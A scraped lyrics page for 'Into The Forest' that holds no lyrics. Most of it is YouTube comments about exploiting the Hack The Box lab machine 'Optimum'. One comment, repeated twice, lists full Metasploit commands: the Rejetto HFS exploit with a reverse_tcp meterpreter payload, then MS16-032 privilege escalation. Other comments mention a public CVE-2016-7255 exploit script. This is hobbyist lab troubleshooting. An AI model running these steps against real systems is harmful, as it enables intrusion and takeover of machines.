Into The Forest
Optimum Vulnerability Lyrics


We have lyrics for 'Into The Forest' by these artists:


Aquaria [John] I crossed the borders of the night Where the sun can…
Jermain Brown Always knew I was different Tried to fit in with the…
St Thomas I went into the forest Even before my birth You think that…
St. Thomas I went into the forest Even before my birth You…





The lyrics are frequently found in the comments by searching or by filtering for lyric videos
Genre not found
Artist not found
Album not found
Song not found
Most interesting comment from YouTube:

Horizon Holt

​@TheCast I acknowledge that "Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Number*" does indeed show that there are 2 cores. How did you guys do it? I just tried it and it still does not work for me.
I used these commands to get a low-privilege meterpreter session:
msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST tun0
set payload windows/x64/meterpreter/reverse_tcp
run
Then I ran the following commands:
background
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set target 1
set LHOST tun0
set LPORT 4445
set payload windows/x64/meterpreter/reverse_tcp
run
Waited for awhile, then I got "Exploit completed, but no session was created." at the end.



All comments from YouTube:

Daniel Coloma

Your skills always impresses me ! In 30min you show us different methods to escalate and even with your video, I spend hours to do what you show... Thanks for your work

Matt McClure

For the curious, I was having a LOT of trouble getting anything to work in Powershell, my error was I skipped him exploiting Rejetto because I had already done that using a different exploit to get a non-PS shell (therefore I skipped the explantation about PS paths and 32 v. 64 at 9:17)
I picked up the video starting after he got his (64-bit!) PS shell, the Invoke-MS16032.ps1 would run but fail with "No valid thread handles were captured, exiting!" Other exploits would die, no output, etc. Then I tried this one: https://github.com/WindowsExploits/Exploits/blob/master/CVE-2016-7255/CVE-2016-7255.ps1 and got something about "exploit is only for 64-bit." I thought it was just a broken script, then I finally realized, while the OS is 64-bit, just running powershell.exe from a shell runs the 32-bit Powershell. Things I learned:
1. Run [Environment]::Is64BitProcess in PS to determine if you are running 32 or 64 bit PS
2. Run this to launch 64-bit PS binary C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe
After this, the CVE PS script ran a-ok and I got finally SYSTEM without needing Metasploit. What a frustrating but educational ride.

Vladimir Ichkov

Dude, thank you so much! I've been beating my head against the wall on a similar machine. How the hell would I know I was running a 32-bit PS... Did you mange to run the exploit directly through cmd.exe without PS? I noticed that my cmd.exe is running on 32-bit so that might be the issue.

Gary Weessies

Umm. There is no longer a \SysNative\ folder in the box. There is a version of powershell in each of \System32 and \SysWOW64 , but the \SysWOW64 one can't privesc. I think they took away the \SysNative folder to make it harder?

Horizon Holt

To anyone who is trying out ms16_032_secondary_logon_handle_privesc on Metasploit as the method to priv esc (as what IppSec and some walkthroughs did), if you are attempting this machine as a Retired machine, you will not be able to use this method anymore, for the fact that retired HTB boxes do not necessarily have the same system specifications of Active machines.

The retired Optimum machine only has 1 core (as seen from systeminfo), while the exploit requires at least 2 cores.

Horizon Holt

​@Xopher000 A fork of the original PowerShell Empire is actively supported by BC-SECURITY on GitHub - do check them out!

Xopher000

I was wondering this too. It also looks like Powershell Empire is no longer supported. Fortunately there are other exploits that do work and are easy to execute

Joseph DeVon

@Horizon Holt i'm having the same issue.

Horizon Holt

​@TheCast I acknowledge that "Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Number*" does indeed show that there are 2 cores. How did you guys do it? I just tried it and it still does not work for me.
I used these commands to get a low-privilege meterpreter session:
msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST tun0
set payload windows/x64/meterpreter/reverse_tcp
run
Then I ran the following commands:
background
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set target 1
set LHOST tun0
set LPORT 4445
set payload windows/x64/meterpreter/reverse_tcp
run
Waited for awhile, then I got "Exploit completed, but no session was created." at the end.

TheCast

did it using the ms16_032 method for five minutes ago

8 More Replies...
More Comments

More Versions